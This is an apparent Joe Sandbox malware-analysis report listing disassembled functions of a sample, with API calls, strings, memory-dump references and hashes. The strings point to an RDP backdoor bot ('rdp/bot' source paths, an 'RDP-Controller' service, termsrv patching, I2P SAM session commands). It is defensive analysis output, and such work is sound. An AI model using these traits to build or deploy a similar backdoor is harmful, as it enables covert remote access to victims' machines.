Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: b77703ae577aa5d73b8ab64137f1823193df00328a205f547bf6fcf4cf55253c
Instruction ID: f54fe53c938c63b174d9ed3da4107a95b1cd16e63b7260b856e2dae6a0853cc5
Opcode Fuzzy Hash: b77703ae577aa5d73b8ab64137f1823193df00328a205f547bf6fcf4cf55253c
Instruction Fuzzy Hash: 73611771A0858785FB20AF94E850BBCA251AB803A8FD55133E90D477E1DEFDE986C321

Function 00007FFE11BD6F2B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 132stringtimeCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11BD6F93
strlen.MSVCRT ref: 00007FFE11BD6FB5
strlen.MSVCRT ref: 00007FFE11BD6FC9
strlen.MSVCRT ref: 00007FFE11BD703F
strlen.MSVCRT ref: 00007FFE11BD705B
strlen.MSVCRT ref: 00007FFE11BD706C
CompareFileTime.KERNEL32 ref: 00007FFE11BD70BE

Part of subcall function 00007FFE11BD8B2C: EnterCriticalSection.KERNEL32 ref: 00007FFE11BD8B37

Strings

TermService, xrefs: 00007FFE11BD711D
v32.ini, xrefs: 00007FFE11BD6FDE
termsrv3, xrefs: 00007FFE11BD6FD1
v32.ini, xrefs: 00007FFE11BD7081
%ProgramFiles%\RDP\, xrefs: 00007FFE11BD7021
termsrv3, xrefs: 00007FFE11BD7074

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: strlen$CompareCriticalEnterFileSectionTime
String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
API String ID: 3718746087-844192579
Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
Instruction ID: aeb4c46beb5ed38b5d06503e6e177f3f85a31b9f00ccddc4390442d0c61eb5ce
Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
Instruction Fuzzy Hash: 2A51D611B0CE83C1FF359E27A590BFA56999F447ACF4420B1DA4D4BBA6EE2CE9058740

Function 00007FFE126E3937 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 85memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFE126E396E
WaitForSingleObject.KERNEL32 ref: 00007FFE126E399D
GetProcessHeap.KERNEL32 ref: 00007FFE126E39B9
HeapFree.KERNEL32 ref: 00007FFE126E39CA
EnterCriticalSection.KERNEL32 ref: 00007FFE126E39E1
Sleep.KERNEL32 ref: 00007FFE126E3A1F
EnterCriticalSection.KERNEL32 ref: 00007FFE126E3A2E
WaitForSingleObject.KERNEL32 ref: 00007FFE126E3A5A
GetProcessHeap.KERNEL32 ref: 00007FFE126E3A76
HeapFree.KERNEL32 ref: 00007FFE126E3A87
LeaveCriticalSection.KERNEL32 ref: 00007FFE126E3A96

Strings

[I] (%s) -> Client gone(client=0x%llx), xrefs: 00007FFE126E3988
routine_gc, xrefs: 00007FFE126E3981

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
API String ID: 2654219296-2700516951
Opcode ID: b4e0eebd0acdf63e55e88a953356f2ca7ce47cd73194c64af9aded8cea86192d
Instruction ID: 90387f703ca77a49d07ec58713c71503d4faae8c5b7e250fc9fa6e7f15df10d9
Opcode Fuzzy Hash: b4e0eebd0acdf63e55e88a953356f2ca7ce47cd73194c64af9aded8cea86192d
Instruction Fuzzy Hash: C341FA21A09E4781FF549F17DCA42B82260AF58B74F1806B5CD2D4A3F4EFBCE8918254

Function 00007FFE1A52B501 Relevance: 21.2, APIs: 4, Strings: 10, Instructions: 181stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1A52B594

Part of subcall function 00007FFE1A52AB26: strcmp.MSVCRT ref: 00007FFE1A52AB6E

strlen.MSVCRT ref: 00007FFE1A52B6BA
strcpy.MSVCRT ref: 00007FFE1A52B6E1
strcpy.MSVCRT ref: 00007FFE1A52B780

Strings

SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s, xrefs: 00007FFE1A52B608
SESSION, xrefs: 00007FFE1A52B64A
DESTINATION, xrefs: 00007FFE1A52B69C
REPLY, xrefs: 00007FFE1A52B725
VALUE, xrefs: 00007FFE1A52B749
RESULT, xrefs: 00007FFE1A52B63C, 00007FFE1A52B71E
STATUS, xrefs: 00007FFE1A52B643
NAMING LOOKUP NAME=ME, xrefs: 00007FFE1A52B6F1
TRANSIENT, xrefs: 00007FFE1A52B684
NAMING, xrefs: 00007FFE1A52B72C

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: strcpystrlen$strcmp
String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
API String ID: 245486318-5999096
Opcode ID: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
Instruction ID: c0357ba2b1e404670aa58a7c2abb9b042e2c7cceb46b48cee721f7d4d07771f5
Opcode Fuzzy Hash: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
Instruction Fuzzy Hash: 9E714D65B0DE42C1EA259AA798103792252AF46FB4F5A43F3DD7D0B7F5DF3CA8018241

Function 00007FF7C1AB1B75 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF7C1AB1BF2
GetLastError.KERNEL32 ref: 00007FF7C1AB1C25

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

~, xrefs: 00007FF7C1AB1C7F
[I] (%s) -> %s, xrefs: 00007FF7C1AB1D26, 00007FF7C1AB1D56
RDP-Controller, xrefs: 00007FF7C1AB1BEB
Service stopping, xrefs: 00007FF7C1AB1D48
P, xrefs: 00007FF7C1AB1C88
Service running, xrefs: 00007FF7C1AB1D18
svc_main, xrefs: 00007FF7C1AB1C30, 00007FF7C1AB1D1F, 00007FF7C1AB1D4F
, xrefs: 00007FF7C1AB1C43
[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu), xrefs: 00007FF7C1AB1C37

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
API String ID: 3562457520-1478336053
Opcode ID: 0c25e388b60b41ac24473c6d1973bb8c34b4bad045c6c824f6d0bc82a1aebc99
Instruction ID: 765eaa75b10202a5a1a8b848de43408de77f542bfac25926b8f1b1ea212f6b51
Opcode Fuzzy Hash: 0c25e388b60b41ac24473c6d1973bb8c34b4bad045c6c824f6d0bc82a1aebc99
Instruction Fuzzy Hash: C851E434E0C68782FB60BF55A4A1BBDE6909F46774FD00037C90E476D2EEDEA9858271

Function 00007FFE1A52AFB0 Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 94memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1A52AFF7
HeapReAlloc.KERNEL32 ref: 00007FFE1A52B00B
strlen.MSVCRT ref: 00007FFE1A52B05D
GetProcessHeap.KERNEL32 ref: 00007FFE1A52B080
HeapFree.KERNEL32 ref: 00007FFE1A52B091
GetProcessHeap.KERNEL32 ref: 00007FFE1A52B0A5
HeapAlloc.KERNEL32 ref: 00007FFE1A52B0B6

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

GetProcessHeap.KERNEL32 ref: 00007FFE1A52B0F8
HeapFree.KERNEL32 ref: 00007FFE1A52B109

Strings

mem_alloc, xrefs: 00007FFE1A52B0C8
sam3_send_req, xrefs: 00007FFE1A52B047
mem_realloc, xrefs: 00007FFE1A52B0E0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1A52B0CF, 00007FFE1A52B0E7
[D] (%s) -> %s, xrefs: 00007FFE1A52B04E

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Heap$Process$AllocFree$fflushfwritestrlen
String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
API String ID: 1135201459-1870638116
Opcode ID: 3739a0e2232f4ce4f9ea34bc067969f42468842cee4b64645b19785e8deb43e7
Instruction ID: 9f86f472d64fe44025826bc815361575c5383f62b520cf0cea077a869a453dfd
Opcode Fuzzy Hash: 3739a0e2232f4ce4f9ea34bc067969f42468842cee4b64645b19785e8deb43e7
Instruction Fuzzy Hash: C4313A51B0EE4685FA55AF93E8403B96352AF86FA0F5840FBDE5E463A5EE2CE504C700

Function 00007FFE1150D030 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150D0CE
GetProcessHeap.KERNEL32 ref: 00007FFE1150D101
HeapAlloc.KERNEL32 ref: 00007FFE1150D112
strcpy.MSVCRT ref: 00007FFE1150D16B
GetProcessHeap.KERNEL32 ref: 00007FFE1150D181
HeapFree.KERNEL32 ref: 00007FFE1150D192

Strings

mem_alloc, xrefs: 00007FFE1150D1A0
[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx), xrefs: 00007FFE1150D0F2
XESS, xrefs: 00007FFE1150D13E
-LTCSES-, xrefs: 00007FFE1150D130
on_tick_expiry, xrefs: 00007FFE1150D0EB
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1150D1A7
-LTCMAS-, xrefs: 00007FFE1150D122

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$AllocFreestrcpystrlen
String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
API String ID: 925994320-1558387473
Opcode ID: ccff84910369868c4f7be9a88cf541ac70a4203e88fafb80ba5cfeec43a8e86f
Instruction ID: 26647edb8c6fcb3df209effa7848eebd40ad88cae9c7bd7fd4ec3dab9b604a38
Opcode Fuzzy Hash: ccff84910369868c4f7be9a88cf541ac70a4203e88fafb80ba5cfeec43a8e86f
Instruction Fuzzy Hash: 36419061A09E4281E751AB97D85437D676AAF44BE4F1404B8EE0E073B6EE3CE845C310

Function 00007FF7C1AB6FD3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB6FFE
strlen.MSVCRT ref: 00007FF7C1AB7027
strlen.MSVCRT ref: 00007FF7C1AB7033
strlen.MSVCRT ref: 00007FF7C1AB7049

Strings

fs_path_temp, xrefs: 00007FF7C1AB7057, 00007FF7C1AB708A, 00007FF7C1AB70BA, 00007FF7C1AB70EA, 00007FF7C1AB7124
(path != NULL), xrefs: 00007FF7C1AB7083
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF7C1AB712B
(path_sz != NULL), xrefs: 00007FF7C1AB70B3
NULL, xrefs: 00007FF7C1AB715D
((*path_sz) > 0), xrefs: 00007FF7C1AB70E3
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB7091, 00007FF7C1AB70C1, 00007FF7C1AB70F1
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB707C, 00007FF7C1AB70AC, 00007FF7C1AB70DC
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF7C1AB705E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: 217260ef382b9f57bd3f4d2d5c8626dcf488df49901fa6627209be964d2bae16
Instruction ID: 56bf718c8c30a820b047d7473cb2a94250795bbedc29eb8de45a9643c06df19f
Opcode Fuzzy Hash: 217260ef382b9f57bd3f4d2d5c8626dcf488df49901fa6627209be964d2bae16
Instruction Fuzzy Hash: 01416F71A08A8385FB21EF55A820BBDA752AF447A8FC45133D94E07795DEFDE906C320

Function 00007FFE126E2C99 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FFE126E2D44
accept.WS2_32 ref: 00007FFE126E2D6B
htonl.WS2_32 ref: 00007FFE126E2D9B
htons.WS2_32 ref: 00007FFE126E2DAC

Part of subcall function 00007FFE126E26B9: ioctlsocket.WS2_32 ref: 00007FFE126E26DF

WSAGetLastError.WS2_32 ref: 00007FFE126E2E5E
WSAGetLastError.WS2_32 ref: 00007FFE126E2E9A

Strings

[W] (%s) -> select timedout(sock=0x%llx), xrefs: 00007FFE126E2E3E
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126E2E71
tcp_accept, xrefs: 00007FFE126E2DEE, 00007FFE126E2E37, 00007FFE126E2E6A, 00007FFE126E2EA6
[E] (%s) -> Failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126E2EAD
[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u), xrefs: 00007FFE126E2DF5

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
API String ID: 2278979430-4175654481
Opcode ID: 7ffc1b42ffd8632f2ed1fbe589379d6f427be0c6db0bcd8f1fd1e9e11f752cc3
Instruction ID: 6ef686c52b1cc453d9935f16f4de786d92ba397e61908ed5ff240ba985f26d86
Opcode Fuzzy Hash: 7ffc1b42ffd8632f2ed1fbe589379d6f427be0c6db0bcd8f1fd1e9e11f752cc3
Instruction Fuzzy Hash: A251E432A08E5689EB20DF16EC503B97261AF447B4F1803B1D97D076F9EFBDA8458B40

Function 00007FFE1A4F1E00 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1A4F1EEC

Strings

[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE1A4F1F1D
(var != NULL), xrefs: 00007FFE1A4F1EA8
ini_get_var, xrefs: 00007FFE1A4F1E49, 00007FFE1A4F1E7C, 00007FFE1A4F1EAF, 00007FFE1A4F1F16, 00007FFE1A4F1F5E
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE1A4F1F65
version, xrefs: 00007FFE1A4F1E00, 00007FFE1A4F1E04
(name != NULL), xrefs: 00007FFE1A4F1E75
(sec != NULL), xrefs: 00007FFE1A4F1E42
main, xrefs: 00007FFE1A4F1E03
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A4F1E3B, 00007FFE1A4F1E6E, 00007FFE1A4F1EA1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A4F1E50, 00007FFE1A4F1E83, 00007FFE1A4F1EB6
NULL, xrefs: 00007FFE1A4F1F7E, 00007FFE1A4F1F87

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-636894343
Opcode ID: 3d1f922fa46d15258c7b81ca59b01e3f4f63ff1320d8409a16869e9ac37485a9
Instruction ID: 1809b26a26c189f83a8f4cb081c16d2f8cef37558739fd430bda4ae94c19dd2f
Opcode Fuzzy Hash: 3d1f922fa46d15258c7b81ca59b01e3f4f63ff1320d8409a16869e9ac37485a9
Instruction Fuzzy Hash: 97413961B0CF4795FA508B0AEA407FC2260BB16BA9F8851F7EB4D065B5DF3CA655C300

Function 00007FFE11ECA870 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11ECA95C

Strings

NULL, xrefs: 00007FFE11ECA9EE, 00007FFE11ECA9F7
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE11ECA9D5
version, xrefs: 00007FFE11ECA870, 00007FFE11ECA874
(name != NULL), xrefs: 00007FFE11ECA8E5
ini_get_var, xrefs: 00007FFE11ECA8B9, 00007FFE11ECA8EC, 00007FFE11ECA91F, 00007FFE11ECA986, 00007FFE11ECA9CE
(sec != NULL), xrefs: 00007FFE11ECA8B2
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11ECA8AB, 00007FFE11ECA8DE, 00007FFE11ECA911
(var != NULL), xrefs: 00007FFE11ECA918
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11ECA8C0, 00007FFE11ECA8F3, 00007FFE11ECA926
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE11ECA98D
main, xrefs: 00007FFE11ECA873

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-636894343
Opcode ID: f6b184bf47517777e27bbaaa4bdcafcc134209ccac4664c9ce8d37e01970d3a7
Instruction ID: 7c353e3ba476283a1aa02fccf34a64c75f230c5e81808dccb0a5b9e1a97f22ca
Opcode Fuzzy Hash: f6b184bf47517777e27bbaaa4bdcafcc134209ccac4664c9ce8d37e01970d3a7
Instruction Fuzzy Hash: EF410B65E48E9795FB108F82AC023FA6268BB44368F8955B2DA5D062B5EF3CF945C300

Function 00007FFE1A4F1C79 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1A4F1D6D

Strings

(ini != NULL), xrefs: 00007FFE1A4F1CBB
version, xrefs: 00007FFE1A4F1C79, 00007FFE1A4F1C7D
(name != NULL), xrefs: 00007FFE1A4F1CEE
ini_get_sec, xrefs: 00007FFE1A4F1CC2, 00007FFE1A4F1CF5, 00007FFE1A4F1D28, 00007FFE1A4F1D86, 00007FFE1A4F1DC4
(sec != NULL), xrefs: 00007FFE1A4F1D21
[D] (%s) -> Done(name=%s), xrefs: 00007FFE1A4F1D8D
main, xrefs: 00007FFE1A4F1C7C
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE1A4F1DCB
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1A4F1CB4, 00007FFE1A4F1CE7, 00007FFE1A4F1D1A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A4F1CC9, 00007FFE1A4F1CFC, 00007FFE1A4F1D2F
NULL, xrefs: 00007FFE1A4F1DE4

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
